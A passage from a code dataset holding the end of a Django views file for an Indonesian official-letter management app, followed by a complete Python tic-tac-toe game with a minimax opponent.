Dokumen.objects.exclude(status=3).filter(\n\t\t\t\tfungsi=ProfileUser.objects.get(user=self.request.user.pk).fungsi.pk)\n\t\t\tcontext['data_surat_masuk'] = Dokumen.objects.exclude(status=3).filter(\n\t\t\t\ttujuan=ProfileUser.objects.get(user=self.request.user.pk).fungsi.pk).values('nomor_surat_lengkap','klasifikasi__kode','klasifikasi__nama_klasifikasi','pejabat_penandatangan','tujuandokumen__status','slug')\n\t\t\t# context['coba'] = data\n\t\telif self.request.user.is_staff_dokumen:\n\t\t\tDokumen.objects.exclude(status=3).filter(fungsi=38).values('tujuandokumen__status')\n\t\t\tcontext['data_surat_keluar'] = Dokumen.objects.exclude(status=3).filter(\n\t\t\t\tfungsi=ProfileUser.objects.get(user=self.request.user.pk).fungsi.pk)\n\n\t\treturn context\n\n\n@method_decorator(login_required, name='dispatch')\nclass BuatDokumen(generic.edit.CreateView):\n\t# http_method_names = \"post\"\n\ttemplate_name = 'dokumen/buat-dokumen.html'\n\tform_class = DokumenForm\n\t\n\tdef get_form_kwargs(self):\n\t\tkwargs = super(BuatDokumen, self).get_form_kwargs()\n\t\tkwargs.update({'user': self.request.user})\n\t\tif self.request.user.is_admin:\n\t\t\tkwargs.update({'fungsi': ''})\n\t\telif self.request.user.is_staff or self.request.user.is_staff_dokumen:\n\t\t\tkwargs.update({'fungsi': ProfileUser.objects.get(user=self.request.user.pk)})\n\t\treturn kwargs\n\t\n\tdef form_valid(self, form):\n\t\t# super(BuatDokumen, self).form_valid()\n\t\tpost = form.save(commit=False)\n\t\tbulan = form.cleaned_data['tanggal'].strftime('%m')\n\t\ttahun = int(form.cleaned_data['tanggal'].strftime('%Y'))\n\t\tid_klasifikasi = form.cleaned_data['klasifikasi'].pk\n\t\tkode_klasifikasi = form.cleaned_data['klasifikasi'].kode\n\t\tkode_fungsi = form.cleaned_data['fungsi'].kode\n\t\tkode_dokumen = form.cleaned_data['jenis_dokumen'].kode\n\t\tnomor_surat = 0\n\t\tnomor = Dokumen.objects.filter(klasifikasi=id_klasifikasi, tanggal__year=tahun).aggregate(Max('nomor_surat'))\n\t\tnomor_terakhir = nomor['nomor_surat__max']\n\t\ttahun_terakhir = Dokumen.objects.filter(klasifikasi=id_klasifikasi).order_by('-tanggal').values_list(\"tanggal\",\n\t\t flat=True)[\n\t\t :1]\n\t\t\n\t\tprint(nomor_terakhir)\n\t\t# print(tahun_terakhir.first().year)\n\t\tprint(tahun)\n\t\t\n\t\t# ini masih masalah\n\t\tif tahun_terakhir.first() is None:\n\t\t\tprint(\"1\", tahun_terakhir.first())\n\t\t\tnomor_surat = 1\n\t\t\n\t\telif tahun_terakhir.first().year == tahun:\n\t\t\tprint(\"3\", tahun_terakhir.first())\n\t\t\tif nomor_terakhir == 0:\n\t\t\t\tnomor_surat = 1\n\t\t\telse:\n\t\t\t\tnomor_surat = nomor_terakhir + 1\n\t\t\n\t\telif tahun_terakhir.first().year <= tahun:\n\t\t\tprint(\"2\", tahun_terakhir.first())\n\t\t\tnomor_surat = 1\n\t\t\n\t\tprint(\"nomor surat baru\", nomor_surat)\n\t\tpost.nomor_surat_lengkap = \"{}.{}/{}/{}/{}/{}\".format(kode_dokumen, nomor_surat, kode_klasifikasi, bulan,\n\t\t tahun, kode_fungsi)\n\t\t\n\t\tprint(self.request.POST.getlist('tujuan'))\n\t\tpost.user = self.request.user\n\t\tpost.nomor_surat = nomor_surat\n\t\tprint(\"{}.{}/{}/{}/{}/{}\".format(kode_dokumen, nomor_surat, kode_klasifikasi, bulan, tahun, kode_fungsi))\n\t\tpost.save()\n\t\tform.save_m2m()\n\t\treturn redirect('dokumen:dashboard')\n\t\n\tdef form_invalid(self, form):\n\t\tprint(form.errors)\n\t\tprint(form.errors.as_data())\n\t\tprint(self.request.POST.getlist('tujuan'))\n\t\treturn HttpResponse(form.errors.as_data())\n\n# def post(self, request, *args, **kwargs):\n# print(request.POST.getlist('tujuan'))\n\n\n@method_decorator(login_required, name='dispatch')\nclass HapusSuratDinas(generic.edit.DeleteView):\n\tmodel = Dokumen\n\tslug_field = 'slug'\n\tsuccess_url = reverse_lazy('dokumen:laporan-surat-dinas')\n\ttemplate_name = 'delete.html'\n\n\n@method_decorator(login_required, name='dispatch')\nclass BatalDokumen(generic.View):\n\tdef get(self, request):\n\t\tslug = request.GET.get('slug', None)\n\t\t# Dokumen.objects.get(slug = slug).delete()\n\t\tDokumen.objects.filter(slug=slug).update(status=\"3\")\n\t\tdata = {\n\t\t\t'deleted': True\n\t\t}\n\t\treturn JsonResponse(data)\n\n@method_decorator(login_required, name='dispatch')\nclass BacaDokumen(generic.View):\n\tdef get(self, request):\n\t\tprint(self.request.user.pk)\n\t\tprint(ProfileUser.objects.get(user=self.request.user.pk).fungsi)\n\t\t# print(TujuanDokumen.objects.get(dokumen__slug='d2ku12201913', fungsi=25))\n\t\t\n\t\tfungsi = ProfileUser.objects.values_list(\"fungsi\", flat=True).get(user=self.request.user.pk)\n\t\tslug = request.GET.get('slug', None)\n\t\ta = TujuanDokumen.objects.get(dokumen__slug=slug, fungsi=fungsi)\n\t\ta.status = 1\n\t\ta.save()\n\t\tdata = {\n\t\t\t'read': True\n\t\t}\n\t\treturn JsonResponse(data)\n\n\n@method_decorator(login_required, name='dispatch')\nclass EditDokumen(generic.edit.UpdateView):\n\tslug_field = 'slug'\n\tform_class = EditForm\n\tmodel = Dokumen\n\ttemplate_name = 'dokumen/update-dokumen.html'\n\t\n\tdef get_form_kwargs(self):\n\t\tkwargs = super(EditDokumen, self).get_form_kwargs()\n\t\tkwargs.update({'user': self.request.user})\n\t\tif self.request.user.is_admin:\n\t\t\tkwargs.update({'fungsi': ''})\n\t\telif self.request.user.is_staff or self.request.user.is_staff_dokumen:\n\t\t\tkwargs.update({'fungsi': ProfileUser.objects.get(user=self.request.user.pk)})\n\t\treturn kwargs\n\t\n\tdef form_valid(self, form):\n\t\tpost = form.save(commit=False)\n\t\tbulan = form.cleaned_data['tanggal'].strftime('%m')\n\t\ttahun = int(form.cleaned_data['tanggal'].strftime('%Y'))\n\t\tid_klasifikasi = form.cleaned_data['klasifikasi'].pk\n\t\tkode_klasifikasi = form.cleaned_data['klasifikasi'].kode\n\t\tkode_fungsi = form.cleaned_data['fungsi'].kode\n\t\tkode_dokumen = form.cleaned_data['jenis_dokumen'].kode\n\t\tnomor_surat = 0\n\t\tnomor = Dokumen.objects.filter(klasifikasi=id_klasifikasi, tanggal__year=tahun).aggregate(Max('nomor_surat'))\n\t\tnomor_terakhir = nomor['nomor_surat__max']\n\t\ttahun_terakhir = Dokumen.objects.filter(klasifikasi=id_klasifikasi).order_by('-tanggal').values_list(\"tanggal\",\n\t\t flat=True)[\n\t\t :1]\n\t\tid_klasifikasi_terakhir = Dokumen.objects.get(slug=self.kwargs.get('slug')).klasifikasi_id\n\t\tprint(\"id slug \", self.kwargs.get('slug'))\n\t\tprint(\"id klasifikasi terakhir \", id_klasifikasi_terakhir)\n\t\t#\n\t\tnomor_sekarang = Dokumen.objects.get(slug=self.kwargs.get('slug')).nomor_surat\n\t\tprint('nomor sekarang ',nomor_sekarang)\n\t\tif id_klasifikasi == id_klasifikasi_terakhir:\n\t\t\tnomor_surat = nomor_sekarang\n\t\telse:\n\t\t\tprint(nomor_terakhir)\n\t\t\tprint(tahun)\n\t\t\t# ini masih masalah\n\t\t\tif tahun_terakhir.first() is None:\n\t\t\t\tprint(\"1\", tahun_terakhir.first())\n\t\t\t\tnomor_surat = 1\n\t\t\t\n\t\t\telif tahun_terakhir.first().year == tahun:\n\t\t\t\tprint(\"3\", tahun_terakhir.first())\n\t\t\t\tif nomor_terakhir == 0:\n\t\t\t\t\tnomor_surat = 1\n\t\t\t\telse:\n\t\t\t\t\tnomor_surat = nomor_terakhir + 1\n\t\t\t\n\t\t\telif tahun_terakhir.first().year <= tahun:\n\t\t\t\tprint(\"2\", tahun_terakhir.first())\n\t\t\t\tnomor_surat = 1\n\t\t\n\t\tprint(\"nomor surat baru\", nomor_surat)\n\t\tpost.nomor_surat_lengkap = \"{}.{}/{}/{}/{}/{}\".format(kode_dokumen, nomor_surat, kode_klasifikasi, bulan,\n\t\t tahun, kode_fungsi)\n\t\t\n\t\tprint(self.request.POST.getlist('tujuan'))\n\t\tpost.user = self.request.user\n\t\tpost.nomor_surat = nomor_surat\n\t\tprint(\"{}.{}/{}/{}/{}/{}\".format(kode_dokumen, nomor_surat, kode_klasifikasi, bulan, tahun, kode_fungsi))\n\t\tpost.save()\n\t\tform.save_m2m()\n\t\treturn redirect('dokumen:dashboard')\n\t\n\tdef form_invalid(self, form):\n\t\treturn self.render_to_response(self.get_context_data(form=form))\n\n\n\n@method_decorator(login_required, name='dispatch')\nclass DetailDokumen(generic.DetailView):\n\ttemplate_name = 'dokumen/detail-dokumen.html'\n\tmodel = Dokumen\n\n\tdef get_context_data(self, **kwargs):\n\t\tcontext = super(DetailDokumen, self).get_context_data(**kwargs)\n\t\tcontext['tujuan'] = TujuanDokumen.objects.get(fungsi=self.request.session['KODE_FUNGSI'],dokumen=Dokumen.objects.get(slug=self.kwargs.get('slug')).pk)\n\t\tcontext['dokumen'] = Dokumen.objects.get(slug=self.kwargs.get('slug'))\n\t\treturn context\n\n@method_decorator(login_required, name='dispatch')\nclass DetailDokumenKeluar(generic.DetailView):\n\tmodel = Dokumen\n\ttemplate_name = 'dokumen/detail-dokumen-keluar.html'\n\n\tdef get_context_data(self, **kwargs):\n\t\tprint(self.kwargs.get('slug'))\n\t\tcontext = super(DetailDokumenKeluar, self).get_context_data(**kwargs)\n\t\tcontext['data_tujuan'] = TujuanDokumen.objects.filter(dokumen__slug=self.kwargs.get('slug'))\n\t\ta = Dokumen.objects.values_list('tujuan_eksternal',flat=True).get(slug=self.kwargs.get('slug'))\n\t\tprint(a)\n\t\tif a is None :\n\t\t\tcontext['tujuan_eksternal'] = None\n\t\telse:\n\t\t\turl = a\n\t\t\tdata = url.split(\"#\")\n\t\t\tcontext['tujuan_eksternal'] = data\n\n\t\t\tprint(a)\n\t\treturn context\n\n@method_decorator(login_required, name='dispatch')\nclass Laporan(generic.TemplateView):\n\ttemplate_name = 'dokumen/laporan-dokumen.html'\n\n\tdef get_context_data(self, **kwargs):\n\t\tcontext = super(Laporan, self).get_context_data()\n\t\tif self.request.user.is_admin:\n\t\t\tcontext['data_nota_dinas'] = Dokumen.objects.all()\n\t\telif self.request.user.is_staff:\n\t\t\tprint(ProfileUser.objects.get(user=self.request.user.pk).fungsi.pk)\n\t\t\tcontext['data_nota_dinas'] = Dokumen.objects.filter(\n\t\t\t\tfungsi=ProfileUser.objects.get(user=self.request.user.pk).fungsi.pk)\n\t\t# context['jenis_dokumen'] = JenisDokumen.objects.all()\n\t\treturn context\n# tidak dipakai\n\n# Batal Dokumen\n\n# def bataldokumen(request,slug):\n# if request.method == 'POST' and request.is_ajax():\n# try:\n# update = Dokumen.objects.get(slug = slug)\n# update.status = 3\n# update.save()\n# return JsonResponse({'status':'Success', 'msg': 'save successfully'})\n# except:\n# return JsonResponse({'status':'Fail', 'msg': 'Objects doesnt update'})\n# else:\n# return JsonResponse({'status':'Fail', 'msg':'Not a valid request'})\n\n\n# @method_decorator(login_required, name='dispatch')\n# class LaporanSuratDinas(generic.ListView):\n# template_name = 'dokumen/laporan-surat-dinas.html'\n# model = Dokumen\n#\n# def get_context_data(self, **kwargs):\n# context = super(LaporanSuratDinas, self).get_context_data()\n# context['data_surat_dinas'] = Dokumen.objects.filter(jenis_dokumen=5)\n# return context\n#\n#\n# @method_decorator(login_required, name='dispatch')\n# class LaporanNotaDinas(generic.ListView):\n# template_name = 'dokumen/laporan-nota-dinas.html'\n# model = Dokumen\n#\n# # queryset = Dokumen.objects.filter(jenis_dokumen=4)\n# def get_context_data(self, **kwargs):\n# context = super(LaporanNotaDinas, self).get_context_data()\n# context['data_nota_dinas'] = Dokumen.objects.filter(jenis_dokumen=4)\n#\n# context['jenis_dokumen'] = JenisDokumen.objects.all()\n# return context\n#\n# @method_decorator(login_required, name='dispatch')\n# class LaporanNotaDiplomatik(generic.ListView):\n# template_name = 'dokumen/laporan-nota-diplomatik.html'\n# model = Dokumen\n#\n# def get_context_data(self, **kwargs):\n# context = super(LaporanNotaDiplomatik, self).get_context_data()\n# context['data_surat_dinas'] = Dokumen.objects.filter(jenis_dokumen=1)\n# return context\n#\n#\n# @method_decorator(login_required, name='dispatch')\n# class LaporanSuratPerintah(generic.ListView):\n# template_name = 'dokumen/laporan-surat-perintah.html'\n# model = Dokumen\n#\n# def get_context_data(self, **kwargs):\n# context = super(LaporanSuratPerintah, self).get_context_data()\n# context['data_surat_perintah'] = Dokumen.objects.filter(jenis_dokumen=2)\n# return context\n#\n#\n# @method_decorator(login_required, name='dispatch')\n# class LaporanSuratPerintahKerja(generic.ListView):\n# template_name = 'dokumen/laporan-surat-perintah-kerja.html'\n# model = Dokumen\n#\n# def get_context_data(self, **kwargs):\n# context = super(LaporanSuratPerintahKerja, self).get_context_data()\n# context['data_surat_perintah_kerja'] = Dokumen.objects.filter(jenis_dokumen=3)\n# return context\n#\n# @method_decorator(login_required, name='dispatch')\n# class HapusSPK(generic.edit.DeleteView):\n# model = Dokumen\n# slug_field = 'slug'\n# success_url = reverse_lazy('dokumen:laporan-surat-perintah-kerja')\n# template_name = 'delete.html'\n","repo_name":"ahmadsyafiqkamil/edisposisi","sub_path":"dokumen/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":13642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"18978924065","text":"\nclass State:\n def __init__(self):\n self.board = [\n ['*', '*', '*'],\n ['*', '*', '*'],\n ['*', '*', '*'],\n ]\n\n def print(self):\n for row in self.board:\n print(' '.join(row))\n\n\n def successor(self, action):\n ## return new state\n new_state = State()\n for i in range(3):\n for j in range(3):\n if i != action.row or j != action.col:\n new_state.board[i][j] = self.board[i][j]\n else:\n new_state.board[i][j] = action.player\n return new_state\n\n def get_player(self):\n countX = 0\n countO = 0\n for i in range(3):\n for j in range(3):\n if self.board[i][j] == 'X': countX += 1\n elif self.board[i][j] == 'O': countO += 1\n if countX == countO: return 'X'\n else: return 'O'\n\n def get_n_actions(self):\n count = 0\n for i in range(3):\n for j in range(3):\n if self.board[i][j] == '*': count += 1\n return 9-count\n\n def get_successors_and_actions(self):\n ## return list of (action, next_state)\n player = self.get_player()\n for i in range(3):\n for j in range(3):\n if self.board[i][j] == '*':\n action = Action(i, j, player)\n yield action, self.successor(action)\n\n def is_terminal(self):\n for i in range(3): \n if self.check_row(i, 'X') or self.check_row(i, 'O'): return True\n for j in range(3): \n if self.check_col(j, 'X') or self.check_col(j, 'O'): return True\n if self.check_diag('X') or self.check_diag('O'): return True\n if self.check_other_diag('X') or self.check_other_diag('O'): return True\n if self.get_n_actions() == 9: return True\n return False\n\n def check_row(self, i, player):\n for j in range(3):\n if self.board[i][j] != player: return False\n return True\n\n def check_col(self, j, player):\n for i in range(3):\n if self.board[i][j] != player: return False\n return True\n\n def check_diag(self, player):\n for i in range(3):\n if self.board[i][i] != player: return False\n return True\n\n def check_other_diag(self, player):\n for i in range(3):\n if self.board[i][2-i] != player: return False\n return True\n\n def utility(self):\n if self.is_terminal():\n value = 0\n for i in range(3): \n if self.check_row(i, 'X'): value = 1\n if self.check_row(i, 'O'): value = -1\n for j in range(3): \n if self.check_col(j, 'X'): value = 1\n if self.check_col(j, 'O'): value = -1\n if self.check_diag('X'): value = 1\n if self.check_diag('O'): value = -1\n if self.check_other_diag('X'): value = 1\n if self.check_other_diag('O'): value = -1\n return value - self.get_n_actions()*0.1\n else: return None\n\n\ndef get_value(state):\n ## return value, best_action\n if state.is_terminal():\n return state.utility(), None\n\n player = state.get_player()\n if player == 'X': return get_max_value(state)\n else: return get_min_value(state)\n\n\ndef get_max_value(state):\n ## return value, best_action\n max_value = -100\n best_action = None\n for action, next_state in state.get_successors_and_actions():\n next_value, _ = get_value(next_state)\n if next_value > max_value:\n max_value = next_value\n best_action = action\n\n assert(best_action is not None)\n return max_value, best_action\n\n\ndef get_min_value(state):\n ## return value, best_action\n min_value = 100\n best_action = None\n for action, next_state in state.get_successors_and_actions():\n next_value, _ = get_value(next_state)\n if next_value < min_value:\n min_value = next_value\n best_action = action\n\n assert(best_action is not None)\n return min_value, best_action\n\nclass Action:\n def __init__(self, row, col, player):\n # player = X or O\n self.row = row\n self.col = col\n self.player = player\n\n def print(self):\n print('row: {}, col: {}, player: {}'.format(self.row, self.col, self.player))\n\n\nif __name__ == '__main__':\n state = State()\n answer = input(\"Do you want to play first (y/n)?\")\n if answer.lower() == 'y':\n human_player = 'X'\n else:\n human_player = 'O'\n current_player = 'X'\n count = 0\n while not state.is_terminal():\n state.print()\n if current_player == human_player:\n valid_actions = list(state.get_successors_and_actions())\n for i, (action, next_state) in enumerate(valid_actions):\n print(i, end=': ')\n action.print()\n answer = input(f\"Your move: [ 0 - {len(valid_actions)-1} ]\")\n action, next_state = valid_actions[int(answer)]\n state = next_state\n else:\n best_value, best_action = get_value(state)\n print(f\"(value={best_value}) I play: \", end='')\n best_action.print()\n state = state.successor(best_action)\n\n count += 1\n current_player = state.get_player()\n \n print(\"Last state\")\n state.print()","repo_name":"phamgialinhlx/ai-assignment","sub_path":"p2/tictactoe.py","file_name":"tictactoe.py","file_ext":"py","file_size_in_byte":5413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}